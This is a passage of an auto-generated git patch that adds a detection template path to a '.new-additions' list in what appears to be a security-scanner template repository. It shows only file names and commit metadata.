 exposed-panels/xeams-admin-console.yaml
 exposures/files/cargo-lock-package.yaml
 exposures/files/cargo-toml-file.yaml
+exposures/files/db-xml-file.yaml
 misconfiguration/cadvisor-exposure.yaml
 misconfiguration/express-stack-trace.yaml
 technologies/express-default-page.yaml

From 07962cd3105cfd476dd52b489bcd100376c8515f Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Tue, 25 Oct 2022 10:59:43 +0000
Subject: [PATCH 93/93] Auto Generated New Template Addition List [Tue Oct 25
 10:59:43 UTC 2022] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 180d72789c..d63cf5e562 100644
--- a/.new-additions
+++ b/.new-additions
@@ -18,5 +18,6 @@ exposures/files/cargo-toml-file.yaml
 exposures/files/db-xml-file.yaml
 misconfiguration/cadvisor-exposure.yaml
 misconfiguration/express-stack-trace.yaml
+network/detection/vmware-authentication-daemon-detect.yaml
 technologies/express-default-page.yaml
 token-spray/api-nytimes.yaml